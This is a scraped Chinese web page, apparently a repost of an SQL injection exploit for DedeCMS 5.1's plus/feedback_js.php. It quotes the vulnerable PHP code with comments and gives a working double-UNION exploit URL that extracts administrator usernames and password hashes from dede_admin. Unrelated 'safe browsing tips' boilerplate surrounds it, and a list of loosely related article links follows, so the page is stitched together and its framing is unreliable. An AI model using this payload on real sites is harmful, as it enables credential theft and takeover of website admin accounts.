软件安装:装机软件必备包

随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。

作者:st0p&Rainy'Fox

同样是在magic_quotes_gpc=off的情况下可用

漏洞版本:DEDECMS 5.1

此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl

......

$urlindex = 0;

if(empty($arcID))

{

$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");

//此处$arcurl没有过滤

if(is_array($row)) $urlindex = $row['id'];

//存在结果则把$urlindex赋值为查询到的$row['id'],我们可以构造SQL语句带入下面的操作中了

}

if(empty($arcID) && empty($urlindex)) exit();

//如果$arcID为空或$urlindex为空则退出

......

if(empty($arcID)) $wq = " urlindex = '$urlindex' ";

//我们让$arcID为空,刚才上面执行的结果就会被赋值给$wq带入下面的操作中执行了.

else $wq = " aid='$arcID' ";

$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";

$dlist->Init();

$dlist->SetSource($querystring);

看一下利用方法吧,嘿,为了闭合我用了两次union

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

javascript:contentimage(this);>

唉,偶和Rainy'Fox这家伙找目标测试的时候,他竟然说能不能在magic_quotes_gpc=on时通过....这种想法太YD了..也太可怕了,要真可以实现,这个网络界又该乱了,好多程序都是在PHP默认magic_quotes_gpc为关闭时才会调用自身的转义部分...要真能实现,那就是PHP程序的恶梦了...

上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

软件推荐:

php5.1 0day,DEDECMS 5.1 feedback_js.php 0DAY相关推荐

  1. php keep user login,php5.4安装dedecms登录后台空白解决办法(session_register函数已废弃)...

    本地安装dedecms5.7登录后台空白,找了原因,原来是session_register函数已经被php5.4废弃的原因. ------------------------------------- ...

  2. 软件本地化团队 - 〖0day 资源〗 - 2006.06.03 0day

    软件本地化团队 -> [0day 资源] -> 2006.06.03 0day 登录 -> 注册 -> 回复主题 -> 发表主题 kfm 2006-06-03 22:39 ...

  3. dedecms注入漏洞feedback.php,织梦(Dedecms) 5.1 feedback_js.php 注入漏洞

    影响版本: DEDECMS 5.1漏洞描述: 同样是在magic_quotes_gpc=off的情况下可用 此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.p ...

  4. 矩阵对抗与系统补丁200911(第2期)下载

    矩阵对抗与系统补丁200911(第2期) http://down.51cto.com/data/51768 (51cto下载站地址) 主要支持单位: 51CTO安全频道 51CTO互动中心 有关微软和 ...

  5. dedecms php5.4 无法退出后台,解决更换PHP5.4以上版本后Dedecms后台登录空白问题的方法...

    为什么会出现更换PHP5.4以上版本后Dedecms后台登录空白的情况,本文将给大家详细分析,找出真正原因以及解决办法. 把PHP的版本从5.2.14升到了5.4.15,升级完后dedecms后台却打 ...

  6. 从PDO下的SQL注入思路到获得GIT 3000star项目0day

    0x01 PDO简介 PDO全名PHP Data Object PDO扩展为PHP访问数据库定义了一个轻量级的一致接口.PDO提供了一个数据访问抽象层,这意味着,不管使用哪种数据库,都可以使用相同的函 ...

  7. 虚拟专题:知识图谱 | 基于网络防御知识图谱的0day攻击路径预测方法

    来源:网络与信息安全学报 基于网络防御知识图谱的0day攻击路径预测方法 孙澄, 胡浩, 杨英杰, 张红旗 信息工程大学 摘要:针对 0day 漏洞未知性造成的攻击检测难问题,提出了一种基于知识图谱的 ...

  8. php5.4漏洞解决,php5.4.3的远程代码执行漏洞,提权挺管用

    PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令 用这个提权是不是很方便了? // Exploit Title: PHP ...

  9. 谷歌紧急修复已遭在野利用的0day

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 摘要 谷歌发布 Windows.Mac 和 Linux 版本的 Chrome 100.0.4896.127,修复已遭利用的高危0day漏洞(CV ...

最新文章

  1. 让你爽到飞起的【懒人插件AutoScssStruct4Vue】VSCode根据template的标签目录一键生成SCSS/LESS结构,敏捷开发必备插件!!!
  2. Oracle CDC (Change Data Capture)更新数据捕获——概述
  3. CentOS 7.6安装OpenMPI3.1.0
  4. (Shadow,Gradient)
  5. oracle数据库实现不同数据库之间的表格数据定期同步
  6. HTML5做手机站页面字体显示很小的解决方法
  7. 不管服不服 Windows仍是全球第一大桌面系统
  8. 广西农产品(广州)交易会 农业大健康·林裕豪:签约农商对接
  9. Linux之du df free:du文件大小 df分区使用 free内存
  10. 基于Jenkins + Tomcat 的安卓客户端可持续化构建及发布下载(loltube.cn)
  11. eppp如何导入php文件_PHP如何处理文件权限?(代码示例)
  12. 防火墙、防病毒网关、IDS以及该类安全产品开发
  13. JS中的innerHTML和outerHTML区别
  14. 【单片机基础篇】共阴级四位数码管
  15. 理解Mybatis一级缓存,以及如何真正使用到一级缓存
  16. 线性密码分析(简单笔记)
  17. 一定不要想当然啊!!
  18. 优酷视频APP的缓存视频在哪里
  19. CSS隐藏滚动条并可以滚动内容
  20. 5G的NSA和SA,到底啥意思?

热门文章

  1. eigen3.3.8帮助文档下载 chm_MAXHUB文档v1.10.1-MAXHUB文档电脑版下载
  2. wcf简单教程(10) ajax调用,wcf简单教程(10) ajax调用
  3. 南邮 Android 课程设计,南邮大四课程设计.doc
  4. input change获取改变之前的值和改变之后的值_使用Vue3.0新特性造轮子 WidgetUI3.0 (Input输入框组件)
  5. python正则表达式指南_Python正则表达式指南
  6. input自适应_【正点原子FPGA连载】第十一章基于OV5640的自适应二值化实验-领航者ZYNQ之HLS 开发指南...
  7. android控件拖动,移动、解决父布局重绘时控件回到原点
  8. Spring Boot Starters 列表
  9. Python基础--1.2 变量循环基础介绍
  10. python之常见报错整理